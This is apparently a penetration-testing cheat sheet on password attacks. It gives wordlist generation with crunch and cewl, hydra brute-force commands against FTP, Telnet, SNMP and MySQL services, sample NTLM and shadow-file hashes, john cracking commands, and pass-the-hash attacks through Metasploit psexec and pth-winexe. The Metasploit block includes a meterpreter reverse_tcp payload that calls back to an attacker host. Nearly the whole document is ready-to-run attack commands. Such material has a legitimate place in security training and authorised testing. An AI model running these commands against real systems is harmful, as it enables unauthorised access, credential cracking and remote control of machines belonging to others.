Password Attacks

Passwords Generation

Custom

# Basic Syntax
crunch {min} {max} {characters} -o {outputFile}
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 6 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch2.txt

# Generate Specific Passwords
, => upper
@ => lower
^ => special char
% => number
Crunch 8 8 -t ,@@@@^%%

Profiling

cewl -d 1 -m 5 --with-numbers -v -w passcewl.txt https://www.google.com

Online Attack

# FTP
hydra -V -L users.txt -P pass.txt -t 20 192.168.1.104 ftp
hydra -V -L users.txt -e nsr -t 20 192.168.100.31 ftp
hydra -V -L users.txt -P pass.txt -e nsr -t 20 192.168.100.31 ftp

# Telnet
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 telnet

# SNMP
hydra -V -P pass.txt 192.168.1.244 snmp

# MYSQL
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 mysql
hydra -V -L users.txt -p "" -t 10 192.168.1.104 mysql

Offline Attack

Hash Examples

# MD5
user1:827ccb0eea8a706c4c34a16891f84e7b
user2:e988532b766b8272ad0ee62911bffce4

# Windows NTLM & LM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:3a0842db8bfe9eddd03f8f5017348cc8:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test123:1008:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
student123:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Student:1000:AAD3B435B51404EEAAD3B435B51404EE:EAB4556003A83E179A149CE6583E097F:::
test1234:1001:aad3b435b51404eeaad3b435b51404ee:3b1b47e42e0463276e3ded6cef349f93:::

# Linux Hash SHA-512
root:$6$.M0YwYN9$1grnLORHHShGJ5CnNS7gjMYAwPs7sDRdeMJ7HEUeuvgKEBdJ5VGYk866IRDHQE0bM.ou0qlGQhPpCzq46emjL0:17996:0:99999:7:::
test:$6$.Nyrlw0pwMxGTBwI$gQ4jC3D8v7ubCDuAIGsjGqmxLP2/0bC.3FFK2FDDTrZGLa3A7WRBPAHSD5gvz.IZ2wgtAijtiQ3r8hriTG79/.:18003:0:99999:7:::

Hash Cracking

# Linux Hash Formats
john --format=md5crypt hashes.txt # md5 $1
john --format=sha256crypt hashes.txt # sha-256 $5
john --format=sha512crypt hashes.txt # sha-512 $6

# Windows Hash Formats
john --format=LM hashes.txt #LM
john --format=NT hashes.txt #NT

# Normal md5
John --format=raw-MD5 hashes.txt

# Crack using custom wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-MD5 hashes.txt

Pass The Hash

# Metasploit
msfconsole
> use exploit/windows/smb/psexec
> set RHOST 192.168.57.131
> set SMBUser administrator
> set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.57.133
> set LPORT 4444
> exploit

# PTH
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd